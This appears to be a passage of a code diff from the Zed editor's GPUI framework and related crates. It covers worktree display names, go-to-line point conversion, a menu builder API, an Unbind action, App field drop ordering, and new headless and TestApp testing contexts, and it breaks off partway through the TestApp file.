&& !matches
.first()
- .is_some_and(|entry| entry.worktree.branch() == query)
+ .is_some_and(|entry| entry.worktree.display_name() == query)
{
let query = query.replace(' ', "-");
matches.push(WorktreeEntry {
worktree: GitWorktree {
path: Default::default(),
- ref_name: format!("refs/heads/{query}").into(),
+ ref_name: Some(format!("refs/heads/{query}").into()),
sha: Default::default(),
},
positions: Vec::new(),
@@ -707,7 +709,7 @@ impl PickerDelegate for WorktreeListDelegate {
return;
};
if entry.is_new {
- self.create_worktree(&entry.worktree.branch(), secondary, None, window, cx);
+ self.create_worktree(&entry.worktree.display_name(), secondary, None, window, cx);
} else {
self.open_worktree(&entry.worktree.path, secondary, window, cx);
}
@@ -738,16 +740,19 @@ impl PickerDelegate for WorktreeListDelegate {
let (branch_name, sublabel) = if entry.is_new {
(
- Label::new(format!("Create Worktree: \"{}\"…", entry.worktree.branch()))
- .truncate()
- .into_any_element(),
+ Label::new(format!(
+ "Create Worktree: \"{}\"…",
+ entry.worktree.display_name()
+ ))
+ .truncate()
+ .into_any_element(),
format!(
"based off {}",
self.base_branch(cx).unwrap_or("the current branch")
),
)
} else {
- let branch = entry.worktree.branch();
+ let branch = entry.worktree.display_name();
let branch_first_line = branch.lines().next().unwrap_or(branch);
let positions: Vec<_> = entry
.positions
@@ -17,6 +17,7 @@ editor.workspace = true
gpui.workspace = true
language.workspace = true
menu.workspace = true
+multi_buffer.workspace = true
serde.workspace = true
settings.workspace = true
text.workspace = true
@@ -2,7 +2,7 @@ pub mod cursor_position;
use cursor_position::UserCaretPosition;
use editor::{
- Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToOffset, ToPoint,
+ Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToPoint,
actions::Tab,
scroll::{Autoscroll, ScrollOffset},
};
@@ -11,6 +11,7 @@ use gpui::{
Subscription, div, prelude::*,
};
use language::Buffer;
+use multi_buffer::MultiBufferRow;
use text::{Bias, Point};
use theme::ActiveTheme;
use ui::prelude::*;
@@ -228,31 +229,14 @@ impl GoToLine {
let row = query_row.saturating_sub(1);
let character = query_char.unwrap_or(0).saturating_sub(1);
- let start_offset = Point::new(row, 0).to_offset(snapshot);
- const MAX_BYTES_IN_UTF_8: u32 = 4;
- let max_end_offset = snapshot
- .clip_point(
- Point::new(row, character * MAX_BYTES_IN_UTF_8 + 1),
- Bias::Right,
- )
- .to_offset(snapshot);
-
- let mut chars_to_iterate = character;
- let mut end_offset = start_offset;
- 'outer: for text_chunk in snapshot.text_for_range(start_offset..max_end_offset) {
- let mut offset_increment = 0;
- for c in text_chunk.chars() {
- if chars_to_iterate == 0 {
- end_offset += offset_increment;
- break 'outer;
- } else {
- chars_to_iterate -= 1;
- offset_increment += c.len_utf8();
- }
- }
- end_offset += offset_increment;
- }
- Some(snapshot.anchor_before(snapshot.clip_offset(end_offset, Bias::Left)))
+ let target_multi_buffer_row = MultiBufferRow(row);
+ let (buffer_snapshot, target_in_buffer, _) = snapshot.point_to_buffer_point(Point::new(
+ target_multi_buffer_row.min(snapshot.max_row()).0,
+ 0,
+ ))?;
+ let target_point =
+ buffer_snapshot.point_from_external_input(target_in_buffer.row, character);
+ Some(snapshot.anchor_before(target_point))
}
fn relative_line_from_query(&self, cx: &App) -> Option<i32> {
@@ -144,7 +144,7 @@ windows = { version = "0.61", features = ["Win32_Foundation"] }
backtrace.workspace = true
collections = { workspace = true, features = ["test-support"] }
env_logger.workspace = true
-gpui_platform.workspace = true
+gpui_platform = { workspace = true, features = ["font-kit"] }
lyon = { version = "1.0", features = ["extra"] }
rand.workspace = true
scheduler = { workspace = true, features = ["test-support"] }
@@ -181,6 +181,7 @@ fn run_example() {
cx.set_menus(vec![Menu {
name: "Image".into(),
items: vec![MenuItem::action("Quit", Quit)],
+ disabled: false,
}]);
let window_options = WindowOptions {
@@ -273,10 +273,7 @@ fn run_example() {
cx.activate(true);
cx.on_action(|_: &Quit, cx| cx.quit());
cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]);
- cx.set_menus(vec![Menu {
- name: "Image Gallery".into(),
- items: vec![MenuItem::action("Quit", Quit)],
- }]);
+ cx.set_menus([Menu::new("Image Gallery").items([MenuItem::action("Quit", Quit)])]);
let window_options = WindowOptions {
titlebar: Some(TitlebarOptions {
@@ -56,21 +56,23 @@ impl HelloWorld {
}))
.when(self.secondary_open, |this| {
this.child(
- // GPUI can't support deferred here yet,
- // it was inside another deferred element.
- anchored()
- .anchor(Corner::TopLeft)
- .snap_to_window_with_margin(px(8.))
- .child(
- popover()
- .child("This is second level Popover")
- .bg(gpui::white())
- .border_color(gpui::blue())
- .on_mouse_down_out(cx.listener(|this, _, _, cx| {
- this.secondary_open = false;
- cx.notify();
- })),
- ),
+ // Now GPUI supports nested deferred!
+ deferred(
+ anchored()
+ .anchor(Corner::TopLeft)
+ .snap_to_window_with_margin(px(8.))
+ .child(
+ popover()
+ .child("This is second level Popover with nested deferred!")
+ .bg(gpui::white())
+ .border_color(gpui::blue())
+ .on_mouse_down_out(cx.listener(|this, _, _, cx| {
+ this.secondary_open = false;
+ cx.notify();
+ })),
+ ),
+ )
+ .priority(2),
)
})
}
@@ -2,7 +2,7 @@
use gpui::{
App, Context, Global, Menu, MenuItem, SharedString, SystemMenuType, Window, WindowOptions,
- actions, div, prelude::*, rgb,
+ actions, div, prelude::*,
};
use gpui_platform::application;
@@ -12,12 +12,12 @@ impl Render for SetMenus {
fn render(&mut self, _window: &mut Window, _cx: &mut Context<Self>) -> impl IntoElement {
div()
.flex()
- .bg(rgb(0x2e7d32))
+ .bg(gpui::white())
.size_full()
.justify_center()
.items_center()
.text_xl()
- .text_color(rgb(0xffffff))
+ .text_color(gpui::black())
.child("Set Menus Example")
}
}
@@ -28,7 +28,8 @@ fn run_example() {
// Bring the menu bar to the foreground (so you can see the menu bar)
cx.activate(true);
- // Register the `quit` function so it can be referenced by the `MenuItem::action` in the menu bar
+ // Register the `quit` function so it can be referenced
+ // by the `MenuItem::action` in the menu bar
cx.on_action(quit);
cx.on_action(toggle_check);
// Add menu items
@@ -91,19 +92,24 @@ impl Global for AppState {}
fn set_app_menus(cx: &mut App) {
let app_state = cx.global::<AppState>();
- cx.set_menus(vec![Menu {
- name: "set_menus".into(),
- items: vec![
- MenuItem::os_submenu("Services", SystemMenuType::Services),
- MenuItem::separator(),
- MenuItem::action(ViewMode::List, ToggleCheck)
- .checked(app_state.view_mode == ViewMode::List),
- MenuItem::action(ViewMode::Grid, ToggleCheck)
- .checked(app_state.view_mode == ViewMode::Grid),
- MenuItem::separator(),
- MenuItem::action("Quit", Quit),
- ],
- }]);
+ cx.set_menus([Menu::new("set_menus").items([
+ MenuItem::os_submenu("Services", SystemMenuType::Services),
+ MenuItem::separator(),
+ MenuItem::action("Disabled Item", gpui::NoAction).disabled(true),
+ MenuItem::submenu(Menu::new("Disabled Submenu").disabled(true)),
+ MenuItem::separator(),
+ MenuItem::action("List Mode", ToggleCheck).checked(app_state.view_mode == ViewMode::List),
+ MenuItem::submenu(
+ Menu::new("Mode").items([
+ MenuItem::action(ViewMode::List, ToggleCheck)
+ .checked(app_state.view_mode == ViewMode::List),
+ MenuItem::action(ViewMode::Grid, ToggleCheck)
+ .checked(app_state.view_mode == ViewMode::Grid),
+ ]),
+ ),
+ MenuItem::separator(),
+ MenuItem::action("Quit", Quit),
+ ])]);
}
// Associate actions using the `actions!` macro (or `Action` derive macro)
@@ -111,7 +117,7 @@ actions!(set_menus, [Quit, ToggleCheck]);
// Define the quit function that is registered with the App
fn quit(_: &Quit, cx: &mut App) {
- println!("Gracefully quitting the application . . .");
+ println!("Gracefully quitting the application...");
cx.quit();
}
@@ -1,6 +1,7 @@
#![cfg_attr(target_family = "wasm", no_main)]
use std::{
+ borrow::Cow,
ops::{Deref, DerefMut},
sync::Arc,
};
@@ -204,7 +205,7 @@ impl RenderOnce for CharacterGrid {
"❮", "<=", "!=", "==", "--", "++", "=>", "->", "🏀", "🎊", "😍", "❤️", "👍", "👎",
];
- let columns = 11;
+ let columns = 20;
let rows = characters.len().div_ceil(columns);
let grid_rows = (0..rows).map(|row_idx| {
@@ -238,6 +239,7 @@ impl RenderOnce for CharacterGrid {
struct TextExample {
next_id: usize,
+ font_family: SharedString,
}
impl TextExample {
@@ -245,8 +247,33 @@ impl TextExample {
self.next_id += 1;
self.next_id
}
+
+ fn button(
+ text: &str,
+ cx: &mut Context<Self>,
+ on_click: impl Fn(&mut Self, &mut Context<Self>) + 'static,
+ ) -> impl IntoElement {
+ div()
+ .id(text.to_string())
+ .flex_none()
+ .child(text.to_string())
+ .bg(gpui::black())
+ .text_color(gpui::white())
+ .active(|this| this.opacity(0.8))
+ .px_3()
+ .py_1()
+ .on_click(cx.listener(move |this, _, _, cx| on_click(this, cx)))
+ }
}
+const FONT_FAMILIES: [&str; 5] = [
+ ".ZedMono",
+ ".SystemUIFont",
+ "Menlo",
+ "Monaco",
+ "Courier New",
+];
+
impl Render for TextExample {
fn render(&mut self, _window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let tcx = cx.text_context();
@@ -265,7 +292,26 @@ impl Render for TextExample {
let step_up_6 = step_up_5 * type_scale;
div()
+ .font_family(self.font_family.clone())
.size_full()
+ .child(
+ div()
+ .bg(gpui::white())
+ .border_b_1()
+ .border_color(gpui::black())
+ .p_3()
+ .flex()
+ .child(Self::button(&self.font_family, cx, |this, cx| {
+ let new_family = FONT_FAMILIES
+ .iter()
+ .position(|f| *f == this.font_family.as_str())
+ .map(|idx| FONT_FAMILIES[(idx + 1) % FONT_FAMILIES.len()])
+ .unwrap_or(FONT_FAMILIES[0]);
+
+ this.font_family = SharedString::new(new_family);
+ cx.notify();
+ })),
+ )
.child(
div()
.id("text-example")
@@ -304,9 +350,19 @@ fn run_example() {
application().run(|cx: &mut App| {
cx.set_menus(vec![Menu {
name: "GPUI Typography".into(),
+ disabled: false,
items: vec![],
}]);
+ let fonts = [include_bytes!(
+ "../../../assets/fonts/lilex/Lilex-Regular.ttf"
+ )]
+ .iter()
+ .map(|b| Cow::Borrowed(&b[..]))
+ .collect();
+
+ _ = cx.text_system().add_fonts(fonts);
+
cx.init_colors();
cx.set_global(GlobalTextContext(Arc::new(TextContext::default())));
@@ -323,7 +379,12 @@ fn run_example() {
))),
..Default::default()
},
- |_window, cx| cx.new(|_cx| TextExample { next_id: 0 }),
+ |_window, cx| {
+ cx.new(|_cx| TextExample {
+ next_id: 0,
+ font_family: ".ZedMono".into(),
+ })
+ },
)
.unwrap();
@@ -1,7 +1,7 @@
use anyhow::{Context as _, Result};
use collections::HashMap;
pub use gpui_macros::Action;
-pub use no_action::{NoAction, is_no_action};
+pub use no_action::{NoAction, Unbind, is_no_action, is_unbind};
use serde_json::json;
use std::{
any::{Any, TypeId},
@@ -290,19 +290,6 @@ impl ActionRegistry {
}
}
- #[cfg(test)]
- pub(crate) fn load_action<A: Action>(&mut self) {
- self.insert_action(MacroActionData {
- name: A::name_for_type(),
- type_id: TypeId::of::<A>(),
- build: A::build,
- json_schema: A::action_json_schema,
- deprecated_aliases: A::deprecated_aliases(),
- deprecation_message: A::deprecation_message(),
- documentation: A::documentation(),
- });
- }
-
fn insert_action(&mut self, action: MacroActionData) {
let name = action.name;
if self.by_name.contains_key(name) {
@@ -432,7 +419,8 @@ pub fn generate_list_of_all_registered_actions() -> impl Iterator<Item = MacroAc
mod no_action {
use crate as gpui;
- use std::any::Any as _;
+ use schemars::JsonSchema;
+ use serde::Deserialize;
actions!(
zed,
@@ -443,8 +431,23 @@ mod no_action {
]
);
+ /// Action with special handling which unbinds later bindings for the same keystrokes when they
+ /// dispatch the named action, regardless of that action's context.
+ ///
+ /// In keymap JSON this is written as:
+ ///
+ /// `["zed::Unbind", "editor::NewLine"]`
+ #[derive(Clone, Debug, PartialEq, Deserialize, JsonSchema, gpui::Action)]
+ #[action(namespace = zed)]
+ pub struct Unbind(pub gpui::SharedString);
+
/// Returns whether or not this action represents a removed key binding.
pub fn is_no_action(action: &dyn gpui::Action) -> bool {
- action.as_any().type_id() == (NoAction {}).type_id()
+ action.as_any().is::<NoAction>()
+ }
+
+ /// Returns whether or not this action represents an unbind marker.
+ pub fn is_unbind(action: &dyn gpui::Action) -> bool {
+ action.as_any().is::<Unbind>()
}
}
@@ -27,9 +27,13 @@ use collections::{FxHashMap, FxHashSet, HashMap, VecDeque};
pub use context::*;
pub use entity_map::*;
use gpui_util::{ResultExt, debug_panic};
+#[cfg(any(test, feature = "test-support"))]
+pub use headless_app_context::*;
use http_client::{HttpClient, Url};
use smallvec::SmallVec;
#[cfg(any(test, feature = "test-support"))]
+pub use test_app::*;
+#[cfg(any(test, feature = "test-support"))]
pub use test_context::*;
#[cfg(all(target_os = "macos", any(test, feature = "test-support")))]
pub use visual_test_context::*;
@@ -45,7 +49,8 @@ use crate::{
PlatformKeyboardMapper, Point, Priority, PromptBuilder, PromptButton, PromptHandle,
PromptLevel, Render, RenderImage, RenderablePromptHandle, Reservation, ScreenCaptureSource,
SharedString, SubscriberSet, Subscription, SvgRenderer, Task, TextRenderingMode, TextSystem,
- ThermalState, Window, WindowAppearance, WindowHandle, WindowId, WindowInvalidator,
+ ThermalState, Window, WindowAppearance, WindowButtonLayout, WindowHandle, WindowId,
+ WindowInvalidator,
colors::{Colors, GlobalColors},
hash, init_app_menus,
};
@@ -54,6 +59,10 @@ mod async_context;
mod context;
mod entity_map;
#[cfg(any(test, feature = "test-support"))]
+mod headless_app_context;
+#[cfg(any(test, feature = "test-support"))]
+mod test_app;
+#[cfg(any(test, feature = "test-support"))]
mod test_context;
#[cfg(all(target_os = "macos", any(test, feature = "test-support")))]
mod visual_test_context;
@@ -571,21 +580,13 @@ impl GpuiMode {
pub struct App {
pub(crate) this: Weak<AppCell>,
pub(crate) platform: Rc<dyn Platform>,
- pub(crate) mode: GpuiMode,
text_system: Arc<TextSystem>,
- flushing_effects: bool,
- pending_updates: usize,
+
pub(crate) actions: Rc<ActionRegistry>,
pub(crate) active_drag: Option<AnyDrag>,
pub(crate) background_executor: BackgroundExecutor,
pub(crate) foreground_executor: ForegroundExecutor,
- pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box<dyn Any>>,
- asset_source: Arc<dyn AssetSource>,
- pub(crate) svg_renderer: SvgRenderer,
- http_client: Arc<dyn HttpClient>,
- pub(crate) globals_by_type: FxHashMap<TypeId, Box<dyn Any>>,
pub(crate) entities: EntityMap,
- pub(crate) window_update_stack: Vec<WindowId>,
pub(crate) new_entity_observers: SubscriberSet<TypeId, NewEntityListener>,
pub(crate) windows: SlotMap<WindowId, Option<Box<Window>>>,
pub(crate) window_handles: FxHashMap<WindowId, AnyWindowHandle>,
@@ -596,10 +597,8 @@ pub struct App {
pub(crate) global_action_listeners:
FxHashMap<TypeId, Vec<Rc<dyn Fn(&dyn Any, DispatchPhase, &mut Self)>>>,
pending_effects: VecDeque<Effect>,
- pub(crate) pending_notifications: FxHashSet<EntityId>,
- pub(crate) pending_global_notifications: FxHashSet<TypeId>,
+
pub(crate) observers: SubscriberSet<EntityId, Handler>,
- // TypeId is the type of the event that the listener callback expects
pub(crate) event_listeners: SubscriberSet<EntityId, (TypeId, Listener)>,
pub(crate) keystroke_observers: SubscriberSet<(), KeystrokeObserver>,
pub(crate) keystroke_interceptors: SubscriberSet<(), KeystrokeObserver>,
@@ -609,8 +608,30 @@ pub struct App {
pub(crate) global_observers: SubscriberSet<TypeId, Handler>,
pub(crate) quit_observers: SubscriberSet<(), QuitHandler>,
pub(crate) restart_observers: SubscriberSet<(), Handler>,
- pub(crate) restart_path: Option<PathBuf>,
pub(crate) window_closed_observers: SubscriberSet<(), WindowClosedHandler>,
+
+ /// Per-App element arena. This isolates element allocations between different
+ /// App instances (important for tests where multiple Apps run concurrently).
+ pub(crate) element_arena: RefCell<Arena>,
+ /// Per-App event arena.
+ pub(crate) event_arena: Arena,
+
+ // Drop globals last. We need to ensure all tasks owned by entities and
+ // callbacks are marked cancelled at this point as this will also shutdown
+ // the tokio runtime. As any task attempting to spawn a blocking tokio task,
+ // might panic.
+ pub(crate) globals_by_type: FxHashMap<TypeId, Box<dyn Any>>,
+
+ // assets
+ pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box<dyn Any>>,
+ asset_source: Arc<dyn AssetSource>,
+ pub(crate) svg_renderer: SvgRenderer,
+ http_client: Arc<dyn HttpClient>,
+
+ // below is plain data, the drop order is insignificant here
+ pub(crate) pending_notifications: FxHashSet<EntityId>,
+ pub(crate) pending_global_notifications: FxHashSet<TypeId>,
+ pub(crate) restart_path: Option<PathBuf>,
pub(crate) layout_id_buffer: Vec<LayoutId>, // We recycle this memory across layout requests.
pub(crate) propagate_event: bool,
pub(crate) prompt_builder: Option<PromptBuilder>,
@@ -624,13 +645,18 @@ pub struct App {
#[cfg(any(test, feature = "test-support", debug_assertions))]
pub(crate) name: Option<&'static str>,
pub(crate) text_rendering_mode: Rc<Cell<TextRenderingMode>>,
+
+ pub(crate) window_update_stack: Vec<WindowId>,
+ pub(crate) mode: GpuiMode,
+ flushing_effects: bool,
+ pending_updates: usize,
quit_mode: QuitMode,
quitting: bool,
- /// Per-App element arena. This isolates element allocations between different
- /// App instances (important for tests where multiple Apps run concurrently).
- pub(crate) element_arena: RefCell<Arena>,
- /// Per-App event arena.
- pub(crate) event_arena: Arena,
+
+ // We need to ensure the leak detector drops last, after all tasks, callbacks and things have been dropped.
+ // Otherwise it may report false positives.
+ #[cfg(any(test, feature = "leak-detection"))]
+ _ref_counts: Arc<RwLock<EntityRefCounts>>,
}
impl App {
@@ -652,6 +678,9 @@ impl App {
let keyboard_layout = platform.keyboard_layout();
let keyboard_mapper = platform.keyboard_mapper();
+ #[cfg(any(test, feature = "leak-detection"))]
+ let _ref_counts = entities.ref_counts_drop_handle();
+
let app = Rc::new_cyclic(|this| AppCell {
app: RefCell::new(App {
this: this.clone(),
@@ -711,6 +740,9 @@ impl App {
name: None,
element_arena: RefCell::new(Arena::new(1024 * 1024)),
event_arena: Arena::new(1024 * 1024),
+
+ #[cfg(any(test, feature = "leak-detection"))]
+ _ref_counts,
}),
});
@@ -1146,6 +1178,11 @@ impl App {
self.platform.window_appearance()
}
+ /// Returns the window button layout configuration when supported.
+ pub fn button_layout(&self) -> Option<WindowButtonLayout> {
+ self.platform.button_layout()
+ }
+
/// Reads data from the platform clipboard.
pub fn read_from_clipboard(&self) -> Option<ClipboardItem> {
self.platform.read_from_clipboard()
@@ -2041,7 +2078,8 @@ impl App {
}
/// Sets the menu bar for this application. This will replace any existing menu bar.
- pub fn set_menus(&self, menus: Vec<Menu>) {
+ pub fn set_menus(&self, menus: impl IntoIterator<Item = Menu>) {
+ let menus: Vec<Menu> = menus.into_iter().collect();
self.platform.set_menus(menus, &self.keymap.borrow());
}
@@ -479,6 +479,24 @@ impl<'a, T: 'static> Context<'a, T> {
subscription
}
+ /// Registers a callback to be invoked when the window button layout changes.
+ pub fn observe_button_layout_changed(
+ &self,
+ window: &mut Window,
+ mut callback: impl FnMut(&mut T, &mut Window, &mut Context<T>) + 'static,
+ ) -> Subscription {
+ let view = self.weak_entity();
+ let (subscription, activate) = window.button_layout_observers.insert(
+ (),
+ Box::new(move |window, cx| {
+ view.update(cx, |view, cx| callback(view, window, cx))
+ .is_ok()
+ }),
+ );
+ activate();
+ subscription
+ }
+
/// Register a callback to be invoked when a keystroke is received by the application
/// in any window. Note that this fires after all other action and event mechanisms have resolved
/// and that this API will not be invoked if the event's propagation is stopped.
@@ -59,7 +59,8 @@ pub(crate) struct EntityMap {
ref_counts: Arc<RwLock<EntityRefCounts>>,
}
-struct EntityRefCounts {
+#[doc(hidden)]
+pub(crate) struct EntityRefCounts {
counts: SlotMap<EntityId, AtomicUsize>,
dropped_entity_ids: Vec<EntityId>,
#[cfg(any(test, feature = "leak-detection"))]
@@ -84,7 +85,7 @@ impl EntityMap {
}
#[doc(hidden)]
- pub fn ref_counts_drop_handle(&self) -> impl Sized + use<> {
+ pub fn ref_counts_drop_handle(&self) -> Arc<RwLock<EntityRefCounts>> {
self.ref_counts.clone()
}
@@ -0,0 +1,275 @@
+//! Cross-platform headless app context for tests that need real text shaping.
+//!
+//! This replaces the macOS-only `HeadlessMetalAppContext` with a platform-neutral
+//! implementation backed by `TestPlatform`. Tests supply a real `PlatformTextSystem`
+//! (e.g. `DirectWriteTextSystem` on Windows, `MacTextSystem` on macOS) to get
+//! accurate glyph measurements while keeping everything else deterministic.
+//!
+//! Optionally, a renderer factory can be provided to enable real GPU rendering
+//! and screenshot capture via [`HeadlessAppContext::capture_screenshot`].
+
+use crate::{
+ AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, BackgroundExecutor, Bounds,
+ Context, Entity, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer,
+ PlatformTextSystem, Render, Reservation, Size, Task, TestDispatcher, TestPlatform, TextSystem,
+ Window, WindowBounds, WindowHandle, WindowOptions,
+ app::{GpuiBorrow, GpuiMode},
+};
+use anyhow::Result;
+use image::RgbaImage;
+use std::{future::Future, rc::Rc, sync::Arc, time::Duration};
+
+/// A cross-platform headless app context for tests that need real text shaping.
+///
+/// Unlike the old `HeadlessMetalAppContext`, this works on any platform. It uses
+/// `TestPlatform` for deterministic scheduling and accepts a pluggable
+/// `PlatformTextSystem` so tests get real glyph measurements.
+///
+/// # Usage
+///
+/// ```ignore
+/// let text_system = Arc::new(gpui_wgpu::CosmicTextSystem::new("fallback"));
+/// let mut cx = HeadlessAppContext::with_platform(
+/// text_system,
+/// Arc::new(Assets),
+/// || gpui_platform::current_headless_renderer(),
+/// );
+/// ```
+pub struct HeadlessAppContext {
+ /// The underlying app cell.
+ pub app: Rc<AppCell>,
+ /// The background executor for running async tasks.
+ pub background_executor: BackgroundExecutor,
+ /// The foreground executor for running tasks on the main thread.
+ pub foreground_executor: ForegroundExecutor,
+ dispatcher: TestDispatcher,
+ text_system: Arc<TextSystem>,
+}
+
+impl HeadlessAppContext {
+ /// Creates a new headless app context with the given text system.
+ pub fn new(platform_text_system: Arc<dyn PlatformTextSystem>) -> Self {
+ Self::with_platform(platform_text_system, Arc::new(()), || None)
+ }
+
+ /// Creates a new headless app context with a custom text system and asset source.
+ pub fn with_asset_source(
+ platform_text_system: Arc<dyn PlatformTextSystem>,
+ asset_source: Arc<dyn AssetSource>,
+ ) -> Self {
+ Self::with_platform(platform_text_system, asset_source, || None)
+ }
+
+ /// Creates a new headless app context with the given text system, asset source,
+ /// and an optional renderer factory for screenshot support.
+ pub fn with_platform(
+ platform_text_system: Arc<dyn PlatformTextSystem>,
+ asset_source: Arc<dyn AssetSource>,
+ renderer_factory: impl Fn() -> Option<Box<dyn PlatformHeadlessRenderer>> + 'static,
+ ) -> Self {
+ let seed = std::env::var("SEED")
+ .ok()
+ .and_then(|s| s.parse().ok())
+ .unwrap_or(0);
+
+ let dispatcher = TestDispatcher::new(seed);
+ let arc_dispatcher = Arc::new(dispatcher.clone());
+ let background_executor = BackgroundExecutor::new(arc_dispatcher.clone());
+ let foreground_executor = ForegroundExecutor::new(arc_dispatcher);
+
+ let renderer_factory: Box<dyn Fn() -> Option<Box<dyn PlatformHeadlessRenderer>>> =
+ Box::new(renderer_factory);
+ let platform = TestPlatform::with_platform(
+ background_executor.clone(),
+ foreground_executor.clone(),
+ platform_text_system.clone(),
+ Some(renderer_factory),
+ );
+
+ let text_system = Arc::new(TextSystem::new(platform_text_system));
+ let http_client = http_client::FakeHttpClient::with_404_response();
+ let app = App::new_app(platform, asset_source, http_client);
+ app.borrow_mut().mode = GpuiMode::test();
+
+ Self {
+ app,
+ background_executor,
+ foreground_executor,
+ dispatcher,
+ text_system,
+ }
+ }
+
+ /// Opens a window for headless rendering.
+ pub fn open_window<V: Render + 'static>(
+ &mut self,
+ size: Size<Pixels>,
+ build_root: impl FnOnce(&mut Window, &mut App) -> Entity<V>,
+ ) -> Result<WindowHandle<V>> {
+ use crate::{point, px};
+
+ let bounds = Bounds {
+ origin: point(px(0.0), px(0.0)),
+ size,
+ };
+
+ let mut cx = self.app.borrow_mut();
+ cx.open_window(
+ WindowOptions {
+ window_bounds: Some(WindowBounds::Windowed(bounds)),
+ focus: false,
+ show: false,
+ ..Default::default()
+ },
+ build_root,
+ )
+ }
+
+ /// Runs all pending tasks until parked.
+ pub fn run_until_parked(&self) {
+ self.dispatcher.run_until_parked();
+ }
+
+ /// Advances the simulated clock.
+ pub fn advance_clock(&self, duration: Duration) {
+ self.dispatcher.advance_clock(duration);
+ }
+
+ /// Enables parking mode, allowing blocking on real I/O (e.g., async asset loading).
+ pub fn allow_parking(&self) {
+ self.dispatcher.allow_parking();
+ }
+
+ /// Disables parking mode, returning to deterministic test execution.
+ pub fn forbid_parking(&self) {
+ self.dispatcher.forbid_parking();
+ }
+
+ /// Updates app state.
+ pub fn update<R>(&mut self, f: impl FnOnce(&mut App) -> R) -> R {
+ let mut app = self.app.borrow_mut();
+ f(&mut app)
+ }
+
+ /// Updates a window and calls draw to render.
+ pub fn update_window<R>(
+ &mut self,
+ window: AnyWindowHandle,
+ f: impl FnOnce(AnyView, &mut Window, &mut App) -> R,
+ ) -> Result<R> {
+ let mut app = self.app.borrow_mut();
+ app.update_window(window, f)
+ }
+
+ /// Captures a screenshot from a window.
+ ///
+ /// Requires that the context was created with a renderer factory that
+ /// returns `Some` via [`HeadlessAppContext::with_platform`].
+ pub fn capture_screenshot(&mut self, window: AnyWindowHandle) -> Result<RgbaImage> {
+ let mut app = self.app.borrow_mut();
+ app.update_window(window, |_, window, _| window.render_to_image())?
+ }
+
+ /// Returns the text system.
+ pub fn text_system(&self) -> &Arc<TextSystem> {
+ &self.text_system
+ }
+
+ /// Returns the background executor.
+ pub fn background_executor(&self) -> &BackgroundExecutor {
+ &self.background_executor
+ }
+
+ /// Returns the foreground executor.
+ pub fn foreground_executor(&self) -> &ForegroundExecutor {
+ &self.foreground_executor
+ }
+}
+
+impl Drop for HeadlessAppContext {
+ fn drop(&mut self) {
+ // Shut down the app so windows are closed and entity handles are
+ // released before the LeakDetector runs.
+ self.app.borrow_mut().shutdown();
+ }
+}
+
+impl AppContext for HeadlessAppContext {
+ fn new<T: 'static>(&mut self, build_entity: impl FnOnce(&mut Context<T>) -> T) -> Entity<T> {
+ let mut app = self.app.borrow_mut();
+ app.new(build_entity)
+ }
+
+ fn reserve_entity<T: 'static>(&mut self) -> Reservation<T> {
+ let mut app = self.app.borrow_mut();
+ app.reserve_entity()
+ }
+
+ fn insert_entity<T: 'static>(
+ &mut self,
+ reservation: Reservation<T>,
+ build_entity: impl FnOnce(&mut Context<T>) -> T,
+ ) -> Entity<T> {
+ let mut app = self.app.borrow_mut();
+ app.insert_entity(reservation, build_entity)
+ }
+
+ fn update_entity<T: 'static, R>(
+ &mut self,
+ handle: &Entity<T>,
+ update: impl FnOnce(&mut T, &mut Context<T>) -> R,
+ ) -> R {
+ let mut app = self.app.borrow_mut();
+ app.update_entity(handle, update)
+ }
+
+ fn as_mut<'a, T>(&'a mut self, _: &Entity<T>) -> GpuiBorrow<'a, T>
+ where
+ T: 'static,
+ {
+ panic!("Cannot use as_mut with HeadlessAppContext. Call update() instead.")
+ }
+
+ fn read_entity<T, R>(&self, handle: &Entity<T>, read: impl FnOnce(&T, &App) -> R) -> R
+ where
+ T: 'static,
+ {
+ let app = self.app.borrow();
+ app.read_entity(handle, read)
+ }
+
+ fn update_window<T, F>(&mut self, window: AnyWindowHandle, f: F) -> Result<T>
+ where
+ F: FnOnce(AnyView, &mut Window, &mut App) -> T,
+ {
+ let mut lock = self.app.borrow_mut();
+ lock.update_window(window, f)
+ }
+
+ fn read_window<T, R>(
+ &self,
+ window: &WindowHandle<T>,
+ read: impl FnOnce(Entity<T>, &App) -> R,
+ ) -> Result<R>
+ where
+ T: 'static,
+ {
+ let app = self.app.borrow();
+ app.read_window(window, read)
+ }
+
+ fn background_spawn<R>(&self, future: impl Future<Output = R> + Send + 'static) -> Task<R>
+ where
+ R: Send + 'static,
+ {
+ self.background_executor.spawn(future)
+ }
+
+ fn read_global<G, R>(&self, callback: impl FnOnce(&G, &App) -> R) -> R
+ where
+ G: Global,
+ {
+ let app = self.app.borrow();
+ app.read_global(callback)
+ }
+}
@@ -0,0 +1,607 @@
+//! A clean testing API for GPUI applications.
+//!
+//! `TestApp` provides a simpler alternative to `TestAppContext` with:
+//! - Automatic effect flushing after updates
+//! - Clean window creation and inspection
+//! - Input simulation helpers
+//!
+//! # Example
+//! ```ignore
+//! #[test]
+//! fn test_my_view() {
+//! let mut app = TestApp::new();
+//!
+//! let mut window = app.open_window(|window, cx| {
+//! MyView::new(window, cx)
+//! });
+//!
+//! window.update(|view, window, cx| {
+//! view.do_something(cx);
+//! });
+//!
+//! // Check rendered state
+//! assert_eq!(window.title(), Some("Expected Title"));
+//! }
+//! ```
+
+use crate::{
+ AnyWindowHandle, App, AppCell, AppContext, AsyncApp, BackgroundExecutor, BorrowAppContext,
+ Bounds, ClipboardItem, Context, Entity, ForegroundExecutor, Global, InputEvent, Keystroke,
+ MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, Platform,
+ PlatformTextSystem, Point, Render, Size, Task, TestDispatcher, TestPlatform, TextSystem,
+ Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode,
+};
+use std::{future::Future, rc::Rc, sync::Arc, time::Duration};
+
+/// A test application context with a clean API.
+///
+/// Unlike `TestAppContext`, `TestApp` automatically flushes effects after
+/// each update and provides simpler window management.
+pub struct TestApp {
+ app: Rc<AppCell>,
+ platform: Rc<TestPlatform>,
+ background_executor: BackgroundExecutor,
